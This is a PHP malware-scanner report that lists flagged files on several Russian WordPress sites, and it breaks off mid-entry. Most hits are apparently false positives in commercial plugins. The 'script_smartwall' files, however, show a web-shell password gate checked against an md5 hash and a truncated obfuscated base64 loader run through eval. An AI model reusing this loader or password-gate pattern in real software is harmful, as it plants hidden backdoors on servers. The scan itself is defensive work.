//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/script_smartwall/update.php Size: 9.06 kB Created: 2021-06-25 13:21:32 Modified: 2021-06-25 13:21:32 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/script_smartwall/index.php Size: 38.45 kB Created: 2021-06-25 13:21:32 Modified: 2021-06-25 13:21:32 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/script_smartwall/smartwall.php Size: 8.87 kB Created: 2021-06-25 13:21:32 Modified: 2021-06-25 13:21:32 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2020-03-07 13:22:42 Modified: 2020-07-24 20:05:17 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1185 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2020-01-13 17:39:15 Modified: 2020-07-24 20:05:17 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-05-16 14:30:26 Modified: 2021-05-16 14:30:26 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-05-16 14:30:26 Modified: 2021-05-16 14:30:26 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-05-16 14:30:26 Modified: 2021-05-16 14:30:26 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-05-16 14:30:26 Modified: 2021-05-16 14:30:26 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-05-16 14:30:26 Modified: 2021-05-16 14:30:26 Dangers: 2
| Description | Match |
|---|
Exploit execution2 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns);
}
/**
* @return bool
*/
public static function isInlineJsEnabled()
{
$isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] &&
(trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) {
return false;
}
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js
if (array_key_e...
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-05-16 14:30:26 Modified: 2021-05-16 14:30:26 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-05-16 14:30:26 Modified: 2021-05-16 14:30:26 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-05-16 14:30:26 Modified: 2021-05-16 14:30:26 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2020-02-13 15:50:39 Modified: 2020-07-24 20:05:17 Dangers: 1
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.78 kB Created: 2020-02-13 15:50:39 Modified: 2020-07-24 20:05:17 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 7576 Dangerous Hacker credits |
Hacked by
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2020-02-13 15:50:39 Modified: 2020-07-24 20:05:17 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2020-02-13 15:50:39 Modified: 2020-07-24 20:05:17 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2020-02-13 15:50:39 Modified: 2020-07-24 20:05:17 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2020-02-13 15:50:39 Modified: 2020-07-24 20:05:17 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2020-02-13 15:50:39 Modified: 2020-07-24 20:05:17 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2020-02-13 15:50:39 Modified: 2020-07-24 20:05:17 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 12 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_POST)
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2021-03-14 17:38:57 Modified: 2021-03-14 17:38:57 Dangers: 1
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2021-03-14 17:38:52 Modified: 2021-03-14 17:38:52 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2021-03-14 17:38:54 Modified: 2021-03-14 17:38:54 Dangers: 1
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2021-03-14 17:39:08 Modified: 2021-03-14 17:39:08 Dangers: 1
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2021-03-14 17:39:08 Modified: 2021-03-14 17:39:08 Warns: 3
| Description | Match |
|---|
Exploit too_many_chr Line: 1071 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2020-01-13 17:39:14 Modified: 2020-07-24 20:05:17 Dangers: 1
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2020-01-13 17:39:14 Modified: 2020-07-24 20:05:17 Dangers: 1
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2020-01-13 17:39:14 Modified: 2020-07-24 20:05:17 Dangers: 1
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2020-01-13 17:39:14 Modified: 2020-07-24 20:05:17 Dangers: 1
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2020-01-13 17:39:14 Modified: 2020-07-24 20:05:17 Dangers: 1
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2020-01-13 17:39:14 Modified: 2020-07-24 20:05:17 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2020-01-13 17:39:14 Modified: 2020-07-24 20:05:17 Dangers: 1
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2020-01-13 17:39:14 Modified: 2020-07-24 20:05:17 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 177 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/script_smartwall/update.php Size: 9.06 kB Created: 2020-09-27 14:56:12 Modified: 2020-09-27 14:56:23 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/script_smartwall/index.php Size: 38.45 kB Created: 2020-09-27 14:56:13 Modified: 2020-09-27 14:56:23 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-09-27 14:56:13 Modified: 2020-09-27 14:56:22 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2020-04-30 18:03:08 Modified: 2020-07-24 20:10:44 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1185 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-05-16 21:14:21 Modified: 2021-05-16 21:14:21 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-05-16 21:14:21 Modified: 2021-05-16 21:14:21 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-05-16 21:14:21 Modified: 2021-05-16 21:14:21 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-05-16 21:14:21 Modified: 2021-05-16 21:14:21 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-05-16 21:14:21 Modified: 2021-05-16 21:14:21 Dangers: 2
| Description | Match |
|---|
Exploit execution2 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns);
}
/**
* @return bool
*/
public static function isInlineJsEnabled()
{
$isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] &&
(trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) {
return false;
}
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js
if (array_key_e...
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-05-16 21:14:21 Modified: 2021-05-16 21:14:21 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-05-16 21:14:21 Modified: 2021-05-16 21:14:21 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-05-16 21:14:21 Modified: 2021-05-16 21:14:21 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.78 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 7576 Dangerous Hacker credits |
Hacked by
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
